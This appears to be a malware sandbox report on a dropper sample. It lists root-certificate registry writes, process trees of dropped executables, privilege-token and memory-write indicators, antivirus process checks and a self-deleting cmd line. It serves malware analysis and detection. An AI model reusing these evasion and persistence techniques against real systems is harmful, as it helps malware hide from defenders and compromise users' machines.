Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = 040000000100000010000000d5e98140c51869fc462c8975620faa7803000000010000001400000007e032e020b72c3f192f0628a2593a19a70f069e1d0000000100000010000000e3f9af952c6df2aaa41706a77a44c2031400000001000000140000000876cdcb07ff24f6c5cdedbb90bce284374675f76200000001000000200000005c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e0b0000000100000034000000430065007200740075006d002000540072007500730074006500640020004e006500740077006f0072006b002000430041000000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000006500000030633021060b2a84680186f6770205010130123010060a2b0601040182373c0101030200c03021060b2a84680186f6770205010730123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000a8569ccd21ef9cc5737c7a12df608c2cbc545df12000000001000000bf030000308203bb308202a3a00302010202030444c0300d06092a864886f70d0101050500307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b204341301e170d3038313032323132303733375a170d3239313233313132303733375a307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e3fb7da372bac2f0c91487f56b014ee16e4007ba6d275d7ff75b2db35ac7515faba432a66187b66e0f86d2300297f8d76957a118395d6a6479c60159ac3c314a387cd204d24b28e8205f3b07a2cc4d73dbf3ae4fc756d55aa79689faf3ab68d423865927cf0927bcac6e72831c3072dfe0a2e9d2e1747519bd2a9e7b1554041bd74339ad5528c5e21abbf4c0e4ae384933cc76859f3945d2a49ef2128c51f87ce42d7ff5ac5feb169fb12dd1bacc9142774c25c990386fdbf0ccfb8e1e97593ed5604ee60528ed4979134bba48db2ff972d339cafe1fd83472f5b440cf3101c3ecde112d175d1fb850d15e19a769de073328ca5095f9a754cb54865045a9f9490203010001a3423040300f0603551d130101ff040530030101ff301d0603551d0e041604140876cdcb07ff24f6c5cdedbb90bce284374675f7300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100a6a8ad22ce013da6a3ff62d0489d8b5e72b07844e3dc1caf09fd2348fabd2ac4b95504b510a38d27de0b8263d0eede0c3779415b22b2b09a415ca670e0d4d077cb23d300e06c562fe1690d0dd9aabf218150d906a5a8ff9537d0aafee2b3f5992d45848ae54209d774022ff789d899e9bc27d4478dba0d461c77cf14a41cb9a431c49c28740334ff331926a5e90d74b73e97c676e82796a366dde1aef2415bca9856837370e4861ad23141ba2fbe2d135a766f4ee84e810e3f5b0322a012be6658114acb03c4b42a2a2d9617e03954bc48d376279d9a2d06a6c9ec39d2abdb9f9a0b27023529b14095e7f9e89c55881946d6b734f57ece399ad938f151f74f2c	F1BG9.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = 5c000000010000000400000000080000040000000100000010000000d5e98140c51869fc462c8975620faa7803000000010000001400000007e032e020b72c3f192f0628a2593a19a70f069e1d0000000100000010000000e3f9af952c6df2aaa41706a77a44c2031400000001000000140000000876cdcb07ff24f6c5cdedbb90bce284374675f76200000001000000200000005c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e0b0000000100000034000000430065007200740075006d002000540072007500730074006500640020004e006500740077006f0072006b002000430041000000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000006500000030633021060b2a84680186f6770205010130123010060a2b0601040182373c0101030200c03021060b2a84680186f6770205010730123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000a8569ccd21ef9cc5737c7a12df608c2cbc545df11900000001000000100000001f7e750b566b128ac0b8d6576d2a70a52000000001000000bf030000308203bb308202a3a00302010202030444c0300d06092a864886f70d0101050500307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b204341301e170d3038313032323132303733375a170d3239313233313132303733375a307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e3fb7da372bac2f0c91487f56b014ee16e4007ba6d275d7ff75b2db35ac7515faba432a66187b66e0f86d2300297f8d76957a118395d6a6479c60159ac3c314a387cd204d24b28e8205f3b07a2cc4d73dbf3ae4fc756d55aa79689faf3ab68d423865927cf0927bcac6e72831c3072dfe0a2e9d2e1747519bd2a9e7b1554041bd74339ad5528c5e21abbf4c0e4ae384933cc76859f3945d2a49ef2128c51f87ce42d7ff5ac5feb169fb12dd1bacc9142774c25c990386fdbf0ccfb8e1e97593ed5604ee60528ed4979134bba48db2ff972d339cafe1fd83472f5b440cf3101c3ecde112d175d1fb850d15e19a769de073328ca5095f9a754cb54865045a9f9490203010001a3423040300f0603551d130101ff040530030101ff301d0603551d0e041604140876cdcb07ff24f6c5cdedbb90bce284374675f7300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100a6a8ad22ce013da6a3ff62d0489d8b5e72b07844e3dc1caf09fd2348fabd2ac4b95504b510a38d27de0b8263d0eede0c3779415b22b2b09a415ca670e0d4d077cb23d300e06c562fe1690d0dd9aabf218150d906a5a8ff9537d0aafee2b3f5992d45848ae54209d774022ff789d899e9bc27d4478dba0d461c77cf14a41cb9a431c49c28740334ff331926a5e90d74b73e97c676e82796a366dde1aef2415bca9856837370e4861ad23141ba2fbe2d135a766f4ee84e810e3f5b0322a012be6658114acb03c4b42a2a2d9617e03954bc48d376279d9a2d06a6c9ec39d2abdb9f9a0b27023529b14095e7f9e89c55881946d6b734f57ece399ad938f151f74f2c	F1BG9.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118	F1BG9.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	sotema_3.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	sotema_3.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E	F1BG9.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = 0f0000000100000014000000a8569ccd21ef9cc5737c7a12df608c2cbc545df153000000010000006500000030633021060b2a84680186f6770205010130123010060a2b0601040182373c0101030200c03021060b2a84680186f6770205010730123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080b0000000100000034000000430065007200740075006d002000540072007500730074006500640020004e006500740077006f0072006b0020004300410000006200000001000000200000005c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e1400000001000000140000000876cdcb07ff24f6c5cdedbb90bce284374675f71d0000000100000010000000e3f9af952c6df2aaa41706a77a44c20303000000010000001400000007e032e020b72c3f192f0628a2593a19a70f069e2000000001000000bf030000308203bb308202a3a00302010202030444c0300d06092a864886f70d0101050500307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b204341301e170d3038313032323132303733375a170d3239313233313132303733375a307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e3fb7da372bac2f0c91487f56b014ee16e4007ba6d275d7ff75b2db35ac7515faba432a66187b66e0f86d2300297f8d76957a118395d6a6479c60159ac3c314a387cd204d24b28e8205f3b07a2cc4d73dbf3ae4fc756d55aa79689faf3ab68d423865927cf0927bcac6e72831c3072dfe0a2e9d2e1747519bd2a9e7b1554041bd74339ad5528c5e21abbf4c0e4ae384933cc76859f3945d2a49ef2128c51f87ce42d7ff5ac5feb169fb12dd1bacc9142774c25c990386fdbf0ccfb8e1e97593ed5604ee60528ed4979134bba48db2ff972d339cafe1fd83472f5b440cf3101c3ecde112d175d1fb850d15e19a769de073328ca5095f9a754cb54865045a9f9490203010001a3423040300f0603551d130101ff040530030101ff301d0603551d0e041604140876cdcb07ff24f6c5cdedbb90bce284374675f7300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100a6a8ad22ce013da6a3ff62d0489d8b5e72b07844e3dc1caf09fd2348fabd2ac4b95504b510a38d27de0b8263d0eede0c3779415b22b2b09a415ca670e0d4d077cb23d300e06c562fe1690d0dd9aabf218150d906a5a8ff9537d0aafee2b3f5992d45848ae54209d774022ff789d899e9bc27d4478dba0d461c77cf14a41cb9a431c49c28740334ff331926a5e90d74b73e97c676e82796a366dde1aef2415bca9856837370e4861ad23141ba2fbe2d135a766f4ee84e810e3f5b0322a012be6658114acb03c4b42a2a2d9617e03954bc48d376279d9a2d06a6c9ec39d2abdb9f9a0b27023529b14095e7f9e89c55881946d6b734f57ece399ad938f151f74f2c	F1BG9.exe

Runs .reg file with regedit 1 IoCs

Processes:

Regedit.exe

pid process

4760 Regedit.exe

pid	process
4760	Regedit.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

sotema_2.exejfiag3g_gg.exe

pid	process
1640	sotema_2.exe
1640	sotema_2.exe
1904	jfiag3g_gg.exe
1904	jfiag3g_gg.exe
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896
896

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

896
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

sotema_2.exe

pid process

1640 sotema_2.exe

pid	process
896

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

sotema_5.exesotema_7.exeRaRBFtrTBYU1Y0tjpmree9bR.exeaZNvbi1qOlM2iXjLOIdGOTe7.exepowershell.exepowershell.exepowershell.exepowershell.exe55FM6.exeH9LM9.exeF1BG9.exe

description	pid	process
Token: SeDebugPrivilege	448	sotema_5.exe
Token: SeDebugPrivilege	3928	sotema_7.exe
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeDebugPrivilege	448	RaRBFtrTBYU1Y0tjpmree9bR.exe
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeDebugPrivilege	1344	aZNvbi1qOlM2iXjLOIdGOTe7.exe
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeDebugPrivilege	4836	powershell.exe
Token: SeDebugPrivilege	5004	powershell.exe
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeDebugPrivilege	5112	powershell.exe
Token: SeDebugPrivilege	4752	powershell.exe
Token: SeDebugPrivilege	4988	55FM6.exe
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeDebugPrivilege	5232	H9LM9.exe
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeDebugPrivilege	5872	F1BG9.exe
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeShutdownPrivilege	896
Token: SeCreatePagefilePrivilege	896
Token: SeShutdownPrivilege	896

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

V3ujjI6J5Cgn10sQZ2ltQJBx.exeattrib.exe

pid process

4148 V3ujjI6J5Cgn10sQZ2ltQJBx.exe
5420 attrib.exe
5420 attrib.exe

pid	process
4148	V3ujjI6J5Cgn10sQZ2ltQJBx.exe
5420	attrib.exe
5420	attrib.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exesotema_7.exesotema_4.exesotema_1.exe

description	pid	process	target process
PID 4024 wrote to memory of 3100	4024	b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24.exe	setup_installer.exe
PID 4024 wrote to memory of 3100	4024	b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24.exe	setup_installer.exe
PID 4024 wrote to memory of 3100	4024	b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24.exe	setup_installer.exe
PID 3100 wrote to memory of 3104	3100	setup_installer.exe	setup_install.exe
PID 3100 wrote to memory of 3104	3100	setup_installer.exe	setup_install.exe
PID 3100 wrote to memory of 3104	3100	setup_installer.exe	setup_install.exe
PID 3104 wrote to memory of 2288	3104	setup_install.exe	cmd.exe
PID 3104 wrote to memory of 2288	3104	setup_install.exe	cmd.exe
PID 3104 wrote to memory of 2288	3104	setup_install.exe	cmd.exe
PID 3104 wrote to memory of 1224	3104	setup_install.exe	cmd.exe
PID 3104 wrote to memory of 1224	3104	setup_install.exe	cmd.exe
PID 3104 wrote to memory of 1224	3104	setup_install.exe	cmd.exe
PID 3104 wrote to memory of 3108	3104	setup_install.exe	cmd.exe
PID 3104 wrote to memory of 3108	3104	setup_install.exe	cmd.exe
PID 3104 wrote to memory of 3108	3104	setup_install.exe	cmd.exe
PID 3104 wrote to memory of 2180	3104	setup_install.exe	cmd.exe
PID 3104 wrote to memory of 2180	3104	setup_install.exe	cmd.exe
PID 3104 wrote to memory of 2180	3104	setup_install.exe	cmd.exe
PID 3104 wrote to memory of 1492	3104	setup_install.exe	cmd.exe
PID 3104 wrote to memory of 1492	3104	setup_install.exe	cmd.exe
PID 3104 wrote to memory of 1492	3104	setup_install.exe	cmd.exe
PID 3104 wrote to memory of 644	3104	setup_install.exe	cmd.exe
PID 3104 wrote to memory of 644	3104	setup_install.exe	cmd.exe
PID 3104 wrote to memory of 644	3104	setup_install.exe	cmd.exe
PID 3104 wrote to memory of 2880	3104	setup_install.exe	cmd.exe
PID 3104 wrote to memory of 2880	3104	setup_install.exe	cmd.exe
PID 3104 wrote to memory of 2880	3104	setup_install.exe	cmd.exe
PID 2180 wrote to memory of 3832	2180	cmd.exe	sotema_4.exe
PID 2180 wrote to memory of 3832	2180	cmd.exe	sotema_4.exe
PID 2180 wrote to memory of 3832	2180	cmd.exe	sotema_4.exe
PID 644 wrote to memory of 1184	644	cmd.exe	sotema_6.exe
PID 644 wrote to memory of 1184	644	cmd.exe	sotema_6.exe
PID 644 wrote to memory of 1184	644	cmd.exe	sotema_6.exe
PID 1224 wrote to memory of 1640	1224	cmd.exe	sotema_2.exe
PID 1224 wrote to memory of 1640	1224	cmd.exe	sotema_2.exe
PID 1224 wrote to memory of 1640	1224	cmd.exe	sotema_2.exe
PID 1492 wrote to memory of 448	1492	cmd.exe	sotema_5.exe
PID 1492 wrote to memory of 448	1492	cmd.exe	sotema_5.exe
PID 2288 wrote to memory of 484	2288	cmd.exe	sotema_1.exe
PID 2288 wrote to memory of 484	2288	cmd.exe	sotema_1.exe
PID 2288 wrote to memory of 484	2288	cmd.exe	sotema_1.exe
PID 2880 wrote to memory of 3064	2880	cmd.exe	sotema_7.exe
PID 2880 wrote to memory of 3064	2880	cmd.exe	sotema_7.exe
PID 2880 wrote to memory of 3064	2880	cmd.exe	sotema_7.exe
PID 3108 wrote to memory of 860	3108	cmd.exe	sotema_3.exe
PID 3108 wrote to memory of 860	3108	cmd.exe	sotema_3.exe
PID 3108 wrote to memory of 860	3108	cmd.exe	sotema_3.exe
PID 3064 wrote to memory of 3572	3064	sotema_7.exe	sotema_7.exe
PID 3064 wrote to memory of 3572	3064	sotema_7.exe	sotema_7.exe
PID 3064 wrote to memory of 3572	3064	sotema_7.exe	sotema_7.exe
PID 3832 wrote to memory of 1776	3832	sotema_4.exe	jfiag3g_gg.exe
PID 3832 wrote to memory of 1776	3832	sotema_4.exe	jfiag3g_gg.exe
PID 3832 wrote to memory of 1776	3832	sotema_4.exe	jfiag3g_gg.exe
PID 484 wrote to memory of 3608	484	sotema_1.exe	rUNdlL32.eXe
PID 484 wrote to memory of 3608	484	sotema_1.exe	rUNdlL32.eXe
PID 484 wrote to memory of 3608	484	sotema_1.exe	rUNdlL32.eXe
PID 3064 wrote to memory of 1568	3064	sotema_7.exe	sotema_7.exe
PID 3064 wrote to memory of 1568	3064	sotema_7.exe	sotema_7.exe
PID 3064 wrote to memory of 1568	3064	sotema_7.exe	sotema_7.exe
PID 3832 wrote to memory of 1904	3832	sotema_4.exe	jfiag3g_gg.exe
PID 3832 wrote to memory of 1904	3832	sotema_4.exe	jfiag3g_gg.exe
PID 3832 wrote to memory of 1904	3832	sotema_4.exe	jfiag3g_gg.exe
PID 3064 wrote to memory of 3952	3064	sotema_7.exe	sotema_7.exe
PID 3064 wrote to memory of 3952	3064	sotema_7.exe	sotema_7.exe

Views/modifies file attributes 1 TTPs 3 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exe

pid process

5420 attrib.exe
5844 attrib.exe
5124 attrib.exe

pid	process
5420	attrib.exe
5844	attrib.exe
5124	attrib.exe

C:\Users\Admin\AppData\Local\Temp\b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24.exe
"C:\Users\Admin\AppData\Local\Temp\b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4024

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3100

C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_1.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2288

C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_1.exe
sotema_1.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:484

C:\Windows\SysWOW64\rUNdlL32.eXe
"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",getmft
6⤵
- Loads dropped DLL
PID:3608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 604
7⤵
- Program crash
PID:3332

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_7.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2880

C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exe
sotema_7.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3064

C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exe
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exe
6⤵
- Executes dropped EXE
PID:3572

C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exe
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exe
6⤵
- Executes dropped EXE
PID:1568

C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exe
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exe
6⤵
- Executes dropped EXE
PID:3952

C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exe
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exe
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3928

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_6.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:644

C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_6.exe
sotema_6.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:1184

C:\Users\Admin\Documents\3yMtczVXNtqMP89LIvk7QYbS.exe
"C:\Users\Admin\Documents\3yMtczVXNtqMP89LIvk7QYbS.exe"
6⤵
- Executes dropped EXE
PID:1204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1204
7⤵
- Program crash
PID:3992

C:\Users\Admin\Documents\aZNvbi1qOlM2iXjLOIdGOTe7.exe
"C:\Users\Admin\Documents\aZNvbi1qOlM2iXjLOIdGOTe7.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1344

C:\Users\Admin\AppData\Local\Temp\RegSvc.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvc.exe"
7⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1572

C:\Users\Admin\Documents\RaRBFtrTBYU1Y0tjpmree9bR.exe
"C:\Users\Admin\Documents\RaRBFtrTBYU1Y0tjpmree9bR.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:448

C:\Users\Admin\AppData\Local\Temp\2a6bacde-3795-4e9f-bf7b-f95052cca579.exe
"C:\Users\Admin\AppData\Local\Temp\2a6bacde-3795-4e9f-bf7b-f95052cca579.exe"
7⤵
- Executes dropped EXE
- Checks processor information in registry
PID:5332

C:\Users\Admin\Documents\plrFbDYtIxqeEfatjuv652pe.exe
"C:\Users\Admin\Documents\plrFbDYtIxqeEfatjuv652pe.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4100

C:\Users\Admin\Documents\ciTtNor6DDyzdbtHN54ouYOI.exe
"C:\Users\Admin\Documents\ciTtNor6DDyzdbtHN54ouYOI.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:4180

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
7⤵
PID:4788

C:\Windows\SysWOW64\cmd.exe
cmd
8⤵
PID:5608

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
9⤵
PID:5700

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
9⤵
- Enumerates processes with tasklist
PID:4376

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
9⤵
- Enumerates processes with tasklist
PID:1888

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
9⤵
PID:4804

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
9⤵
PID:4472

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
Accostarmi.exe.pif N
9⤵
PID:5972

C:\Users\Admin\Documents\NZ3wDc8ii26yAtWGtved6YIF.exe
"C:\Users\Admin\Documents\NZ3wDc8ii26yAtWGtved6YIF.exe"
6⤵
- Executes dropped EXE
PID:4172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\NZ3wDc8ii26yAtWGtved6YIF.exe
7⤵
PID:5984

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
8⤵
PID:4224

C:\Users\Admin\Documents\RvDZTDbVe8cu7cHeyBtfVhCf.exe
"C:\Users\Admin\Documents\RvDZTDbVe8cu7cHeyBtfVhCf.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4488

C:\Users\Admin\AppData\Local\Temp\55FM6.exe
"C:\Users\Admin\AppData\Local\Temp\55FM6.exe"
7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
